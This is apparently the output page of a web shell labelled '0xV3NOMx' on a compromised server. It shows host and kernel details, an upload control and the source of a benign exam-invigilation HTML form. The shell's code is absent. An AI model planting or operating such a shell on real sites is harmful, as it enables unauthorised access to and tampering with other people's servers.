0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.219.12.88


Current Path : /var/www/oasis/html_modules/
Upload File :
Current File : /var/www/oasis/html_modules/ia_invigilators_dairy.html

<script type="text/javascript">
  $(function() {
    $("#tabs").tabs();
  });
  $(function() {
    $("#sub_tabs").tabs();
  });
</script>
<div id="tabs">
  <ul>
    <li><a href="#report_Marklist_subject_wise_div">Invigilators Dairy</a></li>
  </ul>

  <div
    align="left"
    id="report_Marklist_subject_wise_div"
    style="height:250px; overflow:auto"
  >
    <table width="100%" border="0" cellspacing="1" cellpadding="1">
      <tr>
        <td align="left" width="150px">Degree<font color="red">*</font></td>
        <td>
          <select
          id="degree"
          class="select_box"
          style="font-size: 13px"
          onchange="getIAAllotmentDegreeExamName()"
          >
          <option value="">--Select--</option>
          </select>
        </td>
        </tr>
        <tr>
        <td align="left">Exam No.<font color="red">*</font></td>
        <td>
          <select id="degexam"  class="select_box"
          onchange="getIAExamDates()"
          style="font-size: 13px" >
          <option value="">--Select--</option>
          </select>
        </td>
        </tr>
  
        <tr>
          <td align="left" >
            Date<font color="red">*</font>
          </td>
  
          <td>
            <!-- <input
              type="text"
              id="frm_date"
              style="width: 100px;margin-left:-2px;"
              onkeypress="acceptNumbersOnlyForModule(event);"
              onkeydown="dmydateformat(event,this.id)"
              placeholder="dd/mm/yyyy"
              maxlength="10"
            /> -->
            <select id="frm_date"  class="select_box"
            style="width: 100px;margin-left:-2px;"
            onchange="getIASession();"
            style="font-size: 13px" >
            <option value="">--Select--</option>
          </select>
          </td>
        </tr>
        <tr>
          <td>
            Session <font color="red">*</font>
          </td>
          <td align="left">
            <span style="float:left">
             
              <select id="session"  class="select_box"
              style="width: 100px;margin-left:-2px;"
              style="font-size: 13px" >
              <option value="">--Select--</option>
            </select>
  
            </span>
          </td>
        </tr>
      <tr id="reporttype">
        <td align="left">Report Type <font color="red">*</font></td>
 
        <td>
          <select id="rtype" style="width:100px;height:20px">
            <option value="F">Without Photo</option>
            <option value="T">With Photo</option>
          </select>
        </td>
      </tr>
    </table>
  </div>
</div>